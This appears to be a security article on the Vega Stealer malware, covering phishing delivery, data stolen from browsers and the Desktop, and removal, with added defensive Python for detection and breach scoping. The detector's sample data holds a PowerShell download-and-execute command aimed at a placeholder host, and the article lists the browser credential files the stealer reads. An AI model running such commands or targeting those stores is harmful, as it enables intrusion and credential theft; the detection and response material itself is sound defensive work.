Companies in the advertising, marketing, retail and manufacturing industries should be particularly wary of Vega Stealer. The campaign targets larger organizations that publish customer-support contact addresses, since a publicly listed mailbox gives the attackers a guaranteed recipient. A fabricated email sent to that address claims to raise a customer issue and carries a Word document as an attachment; the document is not corrupted but weaponized with a malicious macro. Opening it shows the usual prompt to enable content or macros, and if the recipient complies, the macro silently launches PowerShell, which drops the malware payload onto the computer. From that point the information-stealing Trojan runs its collection routine, and because of the obfuscation it employs, the victim is unlikely to receive any warning that Vega Stealer needs to be removed. Even once it is noticed, removal is not straightforward.
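The delivery chain above (Office document, enabled macro, hidden PowerShell) leaves a recognizable parent/child process relationship that endpoint telemetry can catch. The following is an added example, not code from the original article or from any vendor: it scans process-creation records shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine), flags any Office application spawning a shell, and decodes an `-EncodedCommand` payload so that indicators hidden inside it are matched as well. Every sample record is constructed for the demo, and the URL in the payload uses the reserved `example.invalid` domain.

```python
"""Detect the Office-macro -> hidden PowerShell chain.

Added example, not code from the original article. Input records mimic
Sysmon Event ID 1 fields; SAMPLE_EVENTS below are constructed for the demo.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe"}

# Traits of a silent, non-interactive PowerShell launch and of
# download-and-execute behaviour. Applied to the raw command line and,
# when present, to the decoded -EncodedCommand payload.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "non_interactive": re.compile(r"-noni(?:nteractive)?\b", re.I),
    "policy_bypass": re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download_exec": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I),
}
_ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None."""
    m = _ENC_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def analyze_event(event: Dict[str, str]) -> Optional[dict]:
    """Return an alert for an Office -> shell spawn, else None."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return None
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    haystack = cmd if decoded is None else cmd + "\n" + decoded
    hits = sorted(name for name, pat in INDICATORS.items() if pat.search(haystack))
    # Any Office -> shell spawn deserves a look; stealth flags raise it.
    severity = "high" if len(hits) >= 2 else "medium"
    return {"parent": parent, "child": child, "severity": severity,
            "indicators": hits, "decoded_command": decoded}


def triage(events: List[Dict[str, str]]) -> List[dict]:
    return [a for a in (analyze_event(e) for e in events) if a is not None]


# Constructed payload: the encoded form is built here so the demo is self-contained.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {  # macro-launched, hidden, encoded: the chain described in the text
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": f"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc {_ENCODED}",
    },
    {  # PowerShell started from Explorer: not an Office child, ignored
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -Command Get-Process",
    },
    {  # Word spawning a print helper is normal: not a shell, ignored
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\splwow64.exe",
        "CommandLine": "splwow64.exe 12288",
    },
    {  # Excel -> cmd with no stealth flags: still flagged, medium
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c dir",
    },
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["severity"], alert["parent"], "->", alert["child"], alert["indicators"])
```

The parent/child check alone is the useful signal: a word processor has no business starting a shell, so even the flag-free Excel case is surfaced at medium severity. Decoding `-EncodedCommand` matters because the download-and-execute verbs are otherwise invisible in the raw command line.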
Are you familiar with an infection called August Stealer? Its code has been sold openly on dark web markets, so any cyber criminal can buy it and build a variant of their own. August Stealer is well documented because of its scope: once executed on a system, it can steal passwords, usernames and other login credentials, crypto-currency wallets, remote desktop connection files, web cookies, and practically any file stored on the infected computer. Vega Stealer is a narrower derivative. It targets only data associated with the Mozilla Firefox and Google Chrome web browsers, and while it can steal files, it takes only specific file types located on the Desktop, namely those with the .doc, .docx, .pdf, .rtf, .txt, .xls, and .xlsx extensions. So, if you want to keep private files safe, one simple measure is to keep them off the Desktop. That, of course, does not mean that removing Vega Stealer can wait: even if no personal files are stored on the computer, the longer the malware stays, the more of the data stored in the browser it will harvest.
You now know that files on the Desktop are at risk, but there is much more at stake. For one, HTTP cookies can be stolen and sent to a remote command and control (C&C) server for analysis. The data held in cookies ranges from geographical location and browsing history to session tokens, which let an attacker log in to an account without ever knowing its password. The infection can also extract the victim's full name if a browser profile is set up, along with any credit card details saved for autofill; a full name together with a card number and expiration date is enough for fraud. Passwords are also taken from the Mozilla Firefox profile folder: logins.json holds the saved logins in encrypted form, key3.db and key4.db hold the key material needed to decrypt them, and cookies.sqlite is the cookie store. On top of that, Vega Stealer was found to capture a screenshot of the Desktop ("screenshot.png") to give the attacker even more context. Needless to say, the sooner the target removes Vega Stealer, the smaller the disaster they have to avert.
Vega Stealer may drop files with unfamiliar names, but the infection itself is obfuscated code rather than an obvious application, so a victim who is not experienced or tech-savvy may struggle even to discover it. If a malware scanner does detect it, which might not happen since the threat uses obfuscation to evade discovery and removal, no time should be wasted, because the longer one waits the more information is stolen. That said, since this malware is after a limited set of data, the theft is likely to be completed in minutes, so assume that everything the browser stored has already been taken. How, then, can you remove Vega Stealer from the operating system? Most likely you cannot do it reliably by hand, and even anti-malware software might not fully clean it. The quickest and most reliable way to ensure that the system is malware-free is to reinstall the operating system from known-good media. Unfortunately, that does nothing about the data that has already been exfiltrated. Passwords must be changed immediately, from a clean device rather than the infected one, active web sessions should be signed out everywhere so that stolen cookies stop working, saved payment cards should be reported to the issuer, and all accounts must be watched closely. If customer data was stolen too, appropriate measures must be taken to alert the affected customers and help them protect themselves.
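When responding to an infection like this, the first question is which data on the host fell inside the stealer's collection scope, which determines whose passwords to rotate and which documents to treat as disclosed. The following is an added example, not code from the original article: it takes a file inventory (a list of Windows paths, as an IR tool or a directory listing would produce) and reports, per user profile, the Desktop documents with the targeted extensions and the browser credential stores described above, then turns that into the follow-up actions. The inventory is constructed for the demo. Two assumptions are made that the article does not state: files in subfolders of the Desktop are treated as exposed as well, and the Chrome stores listed (Login Data, Cookies, Web Data) are the standard Chrome profile files, which the article does not name.

```python
"""Scope what Vega Stealer would have collected from a compromised host.

Added example, not code from the original article. SAMPLE_INVENTORY is a
constructed listing. Assumptions not stated in the article: Desktop
subfolders count as exposed; Chrome store file names are the standard ones.
"""
from collections import defaultdict
from pathlib import PureWindowsPath
from typing import Dict, Iterable, List, Optional, Tuple

TARGET_EXTENSIONS = {".doc", ".docx", ".pdf", ".rtf", ".txt", ".xls", ".xlsx"}
FIREFOX_STORES = {"key3.db", "key4.db", "logins.json", "cookies.sqlite"}
CHROME_STORES = {"login data", "cookies", "web data"}  # assumption, see docstring


def _user_of(p: PureWindowsPath) -> Optional[str]:
    """Return the profile name for C:\\Users\\<name>\\... paths, else None."""
    parts = [s.lower() for s in p.parts]
    if len(parts) >= 3 and parts[1] == "users":
        return p.parts[2]
    return None


def classify(path: str) -> Optional[Tuple[str, str]]:
    """Return (user, category) if the file is in scope, else None.

    category is 'desktop_document', 'firefox_store' or 'chrome_store'.
    """
    p = PureWindowsPath(path)
    user = _user_of(p)
    if user is None:
        return None
    lowered = [s.lower() for s in p.parts]
    name = p.name.lower()
    # Desktop documents: anything under <user>\Desktop with a targeted extension
    if len(lowered) > 4 and lowered[3] == "desktop" and p.suffix.lower() in TARGET_EXTENSIONS:
        return user, "desktop_document"
    if name in FIREFOX_STORES and "firefox" in lowered and "profiles" in lowered:
        return user, "firefox_store"
    if name in CHROME_STORES and "chrome" in lowered and "user data" in lowered:
        return user, "chrome_store"
    return None


def exposure_report(inventory: Iterable[str]) -> Dict[str, Dict[str, List[str]]]:
    """Group in-scope files by user profile and category."""
    report: Dict[str, Dict[str, List[str]]] = defaultdict(lambda: defaultdict(list))
    for path in inventory:
        hit = classify(path)
        if hit:
            user, category = hit
            report[user][category].append(path)
    return {u: dict(c) for u, c in report.items()}


def response_actions(report: Dict[str, Dict[str, List[str]]]) -> List[str]:
    """Turn the scope into the concrete follow-ups the article calls for."""
    actions = []
    for user, cats in sorted(report.items()):
        if "firefox_store" in cats or "chrome_store" in cats:
            actions.append(f"{user}: rotate every password saved in the browser from a clean device, "
                           "sign out all web sessions (cookies were in scope), report saved payment cards")
        n = len(cats.get("desktop_document", []))
        if n:
            actions.append(f"{user}: treat {n} Desktop document(s) as disclosed; "
                           "notify customers if they contain customer data")
    return actions


SAMPLE_INVENTORY = [  # constructed listing, not from a real host
    r"C:\Users\alice\Desktop\Q3-forecast.xlsx",
    r"C:\Users\alice\Desktop\invoices\INV-0042.pdf",
    r"C:\Users\alice\Desktop\notes.TXT",
    r"C:\Users\alice\Desktop\vacation.jpg",            # not a targeted type
    r"C:\Users\alice\Documents\contract.docx",         # not on the Desktop
    r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\x1y2z3.default-release\logins.json",
    r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\x1y2z3.default-release\key4.db",
    r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\x1y2z3.default-release\places.sqlite",
    r"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"C:\Users\bob\Desktop\readme.txt",
    r"C:\Windows\System32\drivers\etc\hosts",
]

if __name__ == "__main__":
    for line in response_actions(exposure_report(SAMPLE_INVENTORY)):
        print(line)
```

Extension matching is case-insensitive because Windows is, so notes.TXT is counted; the Documents folder and places.sqlite (Firefox history, not among the files the article lists) are deliberately left out, which is the kind of scoping decision that keeps a breach notification accurate.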